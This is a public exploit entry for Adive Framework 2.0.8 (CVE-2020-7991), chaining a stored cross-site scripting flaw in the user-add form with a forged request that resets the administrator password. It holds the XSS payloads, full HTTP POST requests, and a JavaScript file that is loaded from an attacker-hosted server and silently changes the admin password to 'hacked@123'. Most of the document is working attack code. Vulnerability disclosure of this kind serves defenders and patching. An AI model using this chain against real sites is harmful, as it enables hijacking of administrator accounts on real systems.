Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

47966




Platform:

PHP

Date:

2020-01-28


# Exploit Title:  Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Sarthak Saini
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# CVE:CVE-2020-7991
# Category: Webapps
# Tested on: windows64bit / mozila firefox 
# 
#
|--!>

|----------------------------------------------------------------------------------

1) Persistent Cross-site Scripting at user add page 

Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
 
Payload:- <script>alert(1)</script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3


|----------------------------------------------------------------------------------


2) account takeover - cross side request forgery (Change Admin Password)


Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.

-> Save the payload as exp.js

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
  var nuri ="http://192.168.2.5/admin/config";
  xhttp = new XMLHttpRequest();
  xhttp.open("POST", nuri, true);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhttp.withCredentials = "true";
  var body = "";
  body += "\r\n\r\n";
  body += 
	"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
  xhttp.send(body);
  return true;
}

execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server and host the exp.js. Send the exp.js file in the xss payload

Payload:- <script src="http://192.168.2.5/exp.js"></script>

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3


-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123

|-----------------------------------------EOF-----------------------------------------